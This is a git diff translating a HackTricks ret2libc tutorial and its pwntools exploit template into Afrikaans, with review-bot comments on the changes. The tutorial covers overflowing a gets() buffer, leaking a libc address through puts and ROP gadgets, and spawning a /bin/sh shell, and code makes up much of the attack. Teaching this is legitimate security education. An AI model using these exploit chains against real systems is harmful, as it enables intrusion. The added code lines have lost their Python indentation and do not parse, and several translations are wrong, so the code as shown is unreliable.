-# Quick Resume +# Vinnige Resensie -1. **Find** overflow **offset** -2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets -3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me)) -4. With the library, **calculate the ROP and exploit it** +1. **Vind** oorloop **offset** +2. **Vind** `POP_RDI`, `PUTS_PLT` en `MAIN_PLT` gadgets +3. Gebruik vorige gadgets om die geheue-adres van puts of 'n ander libc-funksie te **lek** en die libc-weergawe te **vind** ([aflaai dit](https://libc.blukat.me)) +4. Met die biblioteek, **bereken die ROP en misbruik dit** -# Other tutorials and binaries to practice +# Ander tutoriale en binaire om te oefen -This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ -Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html) +Hierdie tutorial gaan die kode/binêre lêer wat in hierdie tutorial voorgestel word, uitbuit: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ +Nog nuttige tutoriale: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html) -# Code - -Filename: `vuln.c` +# Kode +Lêernaam: `vuln.c` ```c #include int main() { - char buffer[32]; - puts("Simple ROP.\n"); - gets(buffer); +char buffer[32]; +puts("Simple ROP.\n"); +gets(buffer); - return 0; +return 0; } ``` ```bash gcc -o vuln vuln.c -fno-stack-protector -no-pie ``` +# ROP - Leaking LIBC 
sjabloon -# ROP - Leaking LIBC template - -I'm going to use the code located here to make the exploit.\ -Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script: +Ek gaan die kode wat hier geleë is gebruik om die uitbuiting te maak.\ +Laai die uitbuiting af en plaas dit in dieselfde gids as die kwesbare binêre lêer en gee die nodige data aan die skripsie: {% content-ref url="rop-leaking-libc-template.md" %} [rop-leaking-libc-template.md](rop-leaking-libc-template.md) {% endcontent-ref %} -# 1- Finding the offset - -The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`): +# 1- Vind die verskuiwing +Die sjabloon vereis 'n verskuiwing voordat dit voortgaan met die uitbuiting. As daar geen verskuiwing verskaf word nie, sal dit die nodige kode uitvoer om dit te vind (standaard `OFFSET = ""`): ```bash ################### ### Find offset ### ################### OFFSET = ""#"A"*72 if OFFSET == "": - gdb.attach(p.pid, "c") #Attach and continue - payload = cyclic(1000) - print(r.clean()) - r.sendline(payload) - #x/wx $rsp -- Search for bytes that crashed the application - #cyclic_find(0x6161616b) # Find the offset of those bytes - return +gdb.attach(p.pid, "c") #Attach and continue +payload = cyclic(1000) +print(r.clean()) +r.sendline(payload) +#x/wx $rsp -- Search for bytes that crashed the application +#cyclic_find(0x6161616b) # Find the offset of those bytes +return ``` - -**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console: - +**Voer** `python template.py` uit, 'n GDB-konsole sal geopen word met die program wat afgekap is. 
Voer binne daardie **GDB-konsole** `x/wx $rsp` uit om die **bytes** te kry wat die RIP sou oorskryf. Kry uiteindelik die **offset** deur 'n **python**-konsole te gebruik: ```python from pwn import * cyclic_find(0x6161616b) ``` - ![](<../../../.gitbook/assets/image (140).png>) -After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\ +Nadat die offset (in hierdie geval 40) gevind is, verander die OFFSET-veranderlike binne die sjabloon met daardie waarde.\ `OFFSET = "A" * 40` -Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF. +'n Ander manier sou wees om `pattern create 1000` te gebruik -- _uitvoer tot ret_ -- `pattern search $rsp` vanaf GEF. -# 2- Finding Gadgets - -Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**. +# 2- Vind Gadgets +Nou moet ons ROP-gadgets binne die binêre lêer vind. Hierdie ROP-gadgets sal nuttig wees om `puts` te roep om die **libc** wat gebruik word, te vind, en later om die **finale aanval** te lanceer. ```python PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts MAIN_PLT = elf.symbols['main'] 
@@ -103,108 +94,98 @@ log.info("Main start: " + hex(MAIN_PLT)) log.info("Puts plt: " + hex(PUTS_PLT)) log.info("pop rdi; ret gadget: " + hex(POP_RDI)) ``` +Die `PUTS_PLT` word benodig om die **funksie puts** te roep.\ +Die `MAIN_PLT` word benodig om die **hooffunksie** weer te roep na een interaksie om die oorloop **weer** te **uitbuit** (oneindige rondes van uitbuiting). **Dit word aan die einde van elke ROP gebruik om die program weer te roep**.\ +Die **POP\_RDI** word benodig om 'n **parameter** aan die geroepte funksie oor te dra. -The `PUTS_PLT` is needed to call the **function puts**.\ -The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\ -The **POP\_RDI** is needed to **pass** a **parameter** to the called function. +In hierdie stap hoef jy niks uit te voer nie, aangesien pwntools alles sal vind tydens die uitvoering. -In this step you don't need to execute anything as everything will be found by pwntools during the execution. - -# 3- Finding LIBC library - -Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address. +# 3- Vind LIBC-biblioteek +Nou is dit tyd om uit te vind watter weergawe van die **libc**-biblioteek gebruik word. Om dit te doen, gaan ons die **adres** in die geheue van die **funksie puts** **lek** en dan gaan ons soek in watter **biblioteekweergawe** die puts-weergawe in daardie adres is. 
```python def get_addr(func_name): - FUNC_GOT = elf.got[func_name] - log.info(func_name + " GOT @ " + hex(FUNC_GOT)) - # Create rop chain - rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +FUNC_GOT = elf.got[func_name] +log.info(func_name + " GOT @ " + hex(FUNC_GOT)) +# Create rop chain +rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) - #Send our rop-chain payload - #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment - print(p.clean()) # clean socket buffer (read all and print) - p.sendline(rop1) +#Send our rop-chain payload +#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment +print(p.clean()) # clean socket buffer (read all and print) +p.sendline(rop1) - #Parse leaked address - recieved = p.recvline().strip() - leak = u64(recieved.ljust(8, "\x00")) - log.info("Leaked libc address, "+func_name+": "+ hex(leak)) - #If not libc yet, stop here - if libc != "": - libc.address = leak - libc.symbols[func_name] #Save libc base - log.info("libc base @ %s" % hex(libc.address)) - - return hex(leak) +#Parse leaked address +recieved = p.recvline().strip() +leak = u64(recieved.ljust(8, "\x00")) +log.info("Leaked libc address, "+func_name+": "+ hex(leak)) +#If not libc yet, stop here +if libc != "": +libc.address = leak - libc.symbols[func_name] #Save libc base +log.info("libc base @ %s" % hex(libc.address)) + +return hex(leak) get_addr("puts") #Search for puts address in memmory to obtains libc base if libc == "": - print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)") - p.interactive() +print("Find the libc library and continue with the exploit... 
(https://libc.blukat.me/)") +p.interactive() ``` - -To do so, the most important line of the executed code is: - +Om dit te doen, is die belangrikste lyn van die uitgevoerde kode: ```python rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) ``` +Dit sal 'n paar byte stuur totdat die **RIP** oorskryf kan word: `OFFSET`.\ +Dan sal dit die **adres** van die gadget `POP_RDI` stel sodat die volgende adres (`FUNC_GOT`) in die **RDI**-register gestoor sal word. Dit is omdat ons die `PUTS_GOT`-adres as die adres in die geheue van die puts-funksie wil **oproep** en dit deurgee.\ +Daarna sal `PUTS_PLT` geroep word (met `PUTS_GOT` binne die **RDI**) sodat puts die inhoud binne `PUTS_GOT` (**die adres van die puts-funksie in die geheue**) sal **lees** en dit sal **afdruk**.\ +Uiteindelik word die **hooffunksie weer geroep** sodat ons die oorloop weer kan uitbuit. -This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\ -Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\ -After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\ -Finally, **main function is called again** so we can exploit the overflow again. - -This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**. +Op hierdie manier het ons die puts-funksie **bedrieg** om die **adres** in die **geheue** van die puts-funksie (wat binne die **libc**-biblioteek is) **af te druk**. 
Nou dat ons daardie adres het, kan ons **soek watter libc-weergawe gebruik word**. ![](<../../../.gitbook/assets/image (141).png>) -As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\ -But, in a remote exploit case I will explain here how can you find it: +Aangesien ons 'n **plaaslike** binêre lêer uitbuit, is dit **nie nodig** om uit te vind watter weergawe van **libc** gebruik word nie (vind net die biblioteek in `/lib/x86_64-linux-gnu/libc.so.6`).\ +Maar in die geval van 'n afstandsbediening-uitbuiting sal ek hier verduidelik hoe jy dit kan vind: -## 3.1- Searching for libc version (1) +## 3.1- Soek na libc-weergawe (1) -You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\ -It will also allow you to download the discovered version of **libc** +Jy kan soek watter biblioteek gebruik word op die webwerf: [https://libc.blukat.me/](https://libc.blukat.me)\ +Dit sal jou ook in staat stel om die ontdekte weergawe van **libc** af te laai. ![](<../../../.gitbook/assets/image (142).png>) -## 3.2- Searching for libc version (2) +## 3.2- Soek na libc-weergawe (2) -You can also do: +Jy kan ook doen: * `$ git clone https://github.com/niklasb/libc-database.git` * `$ cd libc-database` * `$ ./get` -This will take some time, be patient.\ -For this to work we need: +Dit sal 'n rukkie neem, wees geduldig.\ +Hiervoor benodig ons: -* Libc symbol name: `puts` -* Leaked libc adddress: `0x7ff629878690` - -We can figure out which **libc** that is most likely used. +* Libc-simbolnaam: `puts` +* Uitgelek libc-adres: `0x7ff629878690` +Ons kan uitvind watter **libc** waarskynlik gebruik word. 
``` ./find puts 0x7ff629878690 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) archive-glibc (id libc6_2.23-0ubuntu11_amd64) ``` - -We get 2 matches (you should try the second one if the first one is not working). Download the first one: - +Ons kry 2 ooreenkomste (jy moet die tweede een probeer as die eerste een nie werk nie). Laai die eerste een af: ``` ./download libc6_2.23-0ubuntu10_amd64 Getting libc6_2.23-0ubuntu10_amd64 - -> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb - -> Downloading package - -> Extracting package - -> Package saved to libs/libc6_2.23-0ubuntu10_amd64 +-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb +-> Downloading package +-> Extracting package +-> Package saved to libs/libc6_2.23-0ubuntu10_amd64 ``` +Kopieer die libc vanaf `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` na ons werksgids. -Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory. - -## 3.3- Other functions to leak - +## 3.3- Ander funksies om te lek ```python puts printf 
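Review bot: Every translated code line in this hunk of rop-leaking-libc-address/README.md has lost its leading indentation, so the `get_addr` snippet no longer parses as Python: `+FUNC_GOT = elf.got[func_name]` through `+return hex(leak)` now sit at column 0 outside `def get_addr(func_name):`, and `+print("Find the libc library ...")` / `+p.interactive()` are no longer inside `if libc == "":`. Pasting the block gives an IndentationError; the original four-space indentation must be restored on each `+` line (the `-` lines show the intended layout). Two wording points in the prose: "afstandsbediening-uitbuiting" means remote-control exploitation, where the English is "remote exploit" (something like "'n uitbuiting op afstand" fits), and the sentence "Dit is omdat ons die `PUTS_GOT`-adres as die adres in die geheue van die puts-funksie wil oproep en dit deurgee" has lost the point of the original, which is that puts is called with `PUTS_GOT` as its argument because the address of puts in memory is stored at `PUTS_GOT`.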
@@ -212,29 +193,25 @@ __libc_start_main read gets ``` +# 4- Vind gebaseerde libc-adres en uitbuiting -# 4- Finding based libc address & exploiting +Op hierdie punt moet ons die gebruikte libc-biblioteek ken. Aangesien ons 'n plaaslike binêre lêer uitbuit, sal ek net gebruik maak van: `/lib/x86_64-linux-gnu/libc.so.6` -At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6` +So, aan die begin van `template.py` verander die **libc** veranderlike na: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Stel biblioteekpad in wanneer dit bekend is` -So, at the beginning of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it` - -Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. - -Inside the `get_addr`function the **base address of libc** is going to be calculated: +Deur die **pad** na die **libc-biblioteek** te gee, sal die res van die **uitbuiting outomaties bereken** word. +Binne die `get_addr`-funksie sal die **basisadres van libc** bereken word: ```python if libc != "": - libc.address = leak - libc.symbols[func_name] #Save libc base - log.info("libc base @ %s" % hex(libc.address)) +libc.address = leak - libc.symbols[func_name] #Save libc base +log.info("libc base @ %s" % hex(libc.address)) ``` - {% hint style="info" %} -Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library. +Let daarop dat die **finale libc basisadres moet eindig in 00**. As dit nie jou geval is nie, het jy dalk 'n verkeerde biblioteek uitgelek. 
{% endhint %} -Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.** - +Dan sal die adres van die funksie `system` en die **adres** van die string _"/bin/sh"_ bereken word vanaf die **basisadres** van **libc** en die **libc-biblioteek** wat gegee is. ```python BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh SYSTEM = libc.sym["system"] @@ -243,9 +220,7 @@ EXIT = libc.sym["exit"] log.info("bin/sh %s " % hex(BINSH)) log.info("system %s " % hex(SYSTEM)) ``` - -Finally, the /bin/sh execution exploit is going to be prepared sent: - +Uiteindelik gaan die /bin/sh uitvoeringsaanval voorberei en gestuur word: ```python rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT) 
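Review bot: In hunk `@@ -212,29 +193,25 @@` the two lines under `if libc != "":` (`+libc.address = leak - libc.symbols[func_name]` and `+log.info("libc base @ %s" % hex(libc.address))`) have been de-indented, which turns the snippet into invalid Python; restore the indentation. The heading `+# 4- Vind gebaseerde libc-adres en uitbuiting` translates "based" literally, but the English "based" is a typo for "base" (the body of the section consistently says "basisadres"), so "Vind die libc-basisadres en uitbuiting" matches the content.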
@@ -255,80 +230,68 @@ p.sendline(rop2) #### Interact with the shell ##### p.interactive() #Interact with the conenction ``` +Laten ons hierdie finale ROP verduidelik.\ +Die laaste ROP (`rop1`) eindig deur weer die hooffunksie te roep, dan kan ons weer die oorloop **uitbuit** (daarom is die `OFFSET` hier weer). Dan wil ons `POP_RDI` roep wat wys na die **adres** van _"/bin/sh"_ (`BINSH`) en die **sisteem**-funksie (`SYSTEM`) roep omdat die adres van _"/bin/sh"_ as 'n parameter oorgedra sal word.\ +Uiteindelik word die **adres van die exit-funksie** geroep sodat die proses **netjies afsluit** en geen waarskuwing gegenereer word. -Let's explain this final ROP.\ -The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\ -Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated. - -**This way the exploit will execute a **_**/bin/sh**_** shell.** +**Op hierdie manier sal die uitbuit 'n **_**/bin/sh**_**-skulp uitvoer.** ![](<../../../.gitbook/assets/image (143).png>) -# 4(2)- Using ONE\_GADGET +# 4(2)- Gebruik ONE\_GADGET -You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \ -However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. 
+Jy kan ook [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget) gebruik om 'n skulp te verkry in plaas van **sisteem** en **"/bin/sh"** te gebruik. **ONE\_GADGET** sal binne die libc-biblioteek 'n manier vind om 'n skulp te verkry deur net een **ROP-adres** te gebruik.\ +Gewoonlik is daar egter beperkings, die mees algemene en maklikste om te vermy is soos `[rsp+0x30] == NULL`. Aangesien jy die waardes binne die **RSP** beheer, hoef jy net nog 'n paar NULL-waardes te stuur sodat die beperking vermy word. ![](<../../../.gitbook/assets/image (615).png>) - ```python ONE_GADGET = libc.address + 0x4526a rop2 = base + p64(ONE_GADGET) + "\x00"*100 ``` +# HACKERINGSLEËR -# EXPLOIT FILE - -You can find a template to exploit this vulnerability here: +Jy kan 'n sjabloon vind om hierdie kwesbaarheid uit te buit hier: {% content-ref url="rop-leaking-libc-template.md" %} [rop-leaking-libc-template.md](rop-leaking-libc-template.md) {% endcontent-ref %} -# Common problems +# Algemene probleme -## MAIN\_PLT = elf.symbols\['main'] not found - -If the "main" symbol does not exist. Then you can just where is the main code: +## MAIN\_PLT = elf.symbols\['main'] nie gevind nie +As die "main" simbool nie bestaan nie. 
Dan kan jy net kyk waar die hoofkode is: ```python objdump -d vuln_binary | grep "\.text" Disassembly of section .text: 0000000000401080 <.text>: ``` - -and set the address manually: - +en stel die adres handmatig in: ```python MAIN_PLT = 0x401080 ``` +## Puts nie gevind nie -## Puts not found +As die binêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van -If the binary is not using Puts you should check if it is using +## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` -## `sh: 1: %s%s%s%s%s%s%s%s: not found` - -If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` - -Try to **subtract 64 bytes to the address of "/bin/sh"**: +As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` +Probeer om **64 byte van die adres van "/bin/sh" af te trek**: ```python BINSH = next(libc.search("/bin/sh")) - 64 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
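Review bot: `+# HACKERINGSLEËR` is not a translation of `-# EXPLOIT FILE` (it reads as "hacking army"); the heading labels the template link that follows, so something like `# UITBUITINGSLÊER` or `# EXPLOIT-LÊER` is needed. Further points in the same hunk `@@ -255,80 +230,68 @@`: the function name `system` is rendered as "sisteem" in "die **sisteem**-funksie (`SYSTEM`)" and "in plaas van **sisteem** en **"/bin/sh"**", but it is an identifier and should stay `system`; "Laten ons" is Dutch, Afrikaans is "Laat ons"; and the shell error message in the code spans, ``+## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie` `` and the sentence below it, translates the literal text the shell prints, so a reader searching for the message they actually see ("not found") will not match. Keep quoted program output in English.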
- - diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md index d759fbff5..ab52d0532 100644 --- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md +++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md @@ -1,16 +1,14 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
@@ -35,25 +33,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it ENV = {"LD_PRELOAD": LIBC} if LIBC else {} if LOCAL: - P = process(LOCAL_BIN, env=ENV) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +P = process(LOCAL_BIN, env=ENV) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTETTCP: - P = remote('10.10.10.10',1339) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +P = remote('10.10.10.10',1339) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets elif REMOTESSH: - ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) - p = ssh_shell.process(REMOTE_BIN) # start the vuln binary - elf = ELF(LOCAL_BIN)# Extract data from binary - rop = ROP(elf)# Find ROP gadgets +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +p = ssh_shell.process(REMOTE_BIN) # start the vuln binary +elf = ELF(LOCAL_BIN)# Extract data from binary +rop = ROP(elf)# Find ROP gadgets if GDB and not REMOTETTCP and not REMOTESSH: - # attach gdb and continue - # You can set breakpoints, for example "break *main" - gdb.attach(P.pid, "b *main") +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") 
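Review bot: Hunk `@@ -35,25 +33,25 @@` contains no translatable text; its only effect is to strip the indentation from the bodies of `if LOCAL:`, `elif REMOTETTCP:`, `elif REMOTESSH:` and `if GDB and not REMOTETTCP and not REMOTESSH:` (for example `+P = process(LOCAL_BIN, env=ENV)` and `+gdb.attach(P.pid, "b *main")` now start at column 0). Since the template is one runnable Python file, this is a SyntaxError as soon as the file is executed; this hunk should be dropped from the translation PR entirely.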
@@ -63,15 +61,15 @@ if GDB and not REMOTETTCP and not REMOTESSH: OFFSET = b"" #b"A"*264 if OFFSET == b"": - gdb.attach(P.pid, "c") #Attach and continue - payload = cyclic(264) - payload += b"AAAAAAAA" - print(P.clean()) - P.sendline(payload) - #x/wx $rsp -- Search for bytes that crashed the application - #print(cyclic_find(0x63616171)) # Find the offset of those bytes - P.interactive() - exit() +gdb.attach(P.pid, "c") #Attach and continue +payload = cyclic(264) +payload += b"AAAAAAAA" +print(P.clean()) +P.sendline(payload) +#x/wx $rsp -- Search for bytes that crashed the application +#print(cyclic_find(0x63616171)) # Find the offset of those bytes +P.interactive() +exit() @@ -79,11 +77,11 @@ if OFFSET == b"": ### Find Gadgets ### #################### try: - libc_func = "puts" - PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts +libc_func = "puts" +PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts except: - libc_func = "printf" - PUTS_PLT = ELF_LOADED.plt['printf'] +libc_func = "printf" +PUTS_PLT = ELF_LOADED.plt['printf'] MAIN_PLT = ELF_LOADED.symbols['main'] POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi" 
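Review bot: Hunk `@@ -63,15 +61,15 @@` is whitespace-only and breaks the `if OFFSET == b"":` block: `+gdb.attach(P.pid, "c")` through `+exit()` are no longer indented under the `if`, so the offset-finding code would run unconditionally if the file parsed at all, and it does not, because the `if` has no body. Revert this hunk.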
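Review bot: Hunk `@@ -79,11 +77,11 @@` de-indents the bodies of `try:` and `except:` (`+libc_func = "puts"`, `+PUTS_PLT = ELF_LOADED.plt['puts']`, `+libc_func = "printf"`, `+PUTS_PLT = ELF_LOADED.plt['printf']`), which is a SyntaxError ("expected an indented block"); nothing else changes in the hunk, so it should be reverted along with the other whitespace-only hunks in this file.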
@@ -100,54 +98,54 @@ log.info("ret gadget: " + hex(RET)) ######################## def generate_payload_aligned(rop): - payload1 = OFFSET + rop - if (len(payload1) % 16) == 0: - return payload1 - - else: - payload2 = OFFSET + p64(RET) + rop - if (len(payload2) % 16) == 0: - log.info("Payload aligned successfully") - return payload2 - else: - log.warning(f"I couldn't align the payload! Len: {len(payload1)}") - return payload1 +payload1 = OFFSET + rop +if (len(payload1) % 16) == 0: +return payload1 + +else: +payload2 = OFFSET + p64(RET) + rop +if (len(payload2) % 16) == 0: +log.info("Payload aligned successfully") +return payload2 +else: +log.warning(f"I couldn't align the payload! Len: {len(payload1)}") +return payload1 def get_addr(libc_func): - FUNC_GOT = ELF_LOADED.got[libc_func] - log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) - # Create rop chain - rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) - rop1 = generate_payload_aligned(rop1) +FUNC_GOT = ELF_LOADED.got[libc_func] +log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) +# Create rop chain +rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +rop1 = generate_payload_aligned(rop1) - # Send our rop-chain payload - #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received - print(P.clean()) # clean socket buffer (read all and print) - P.sendline(rop1) +# Send our rop-chain payload +#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received +print(P.clean()) # clean socket buffer (read all and print) +P.sendline(rop1) - # If binary is echoing back the payload, remove that message - recieved = P.recvline().strip() - if OFFSET[:30] in recieved: - recieved = 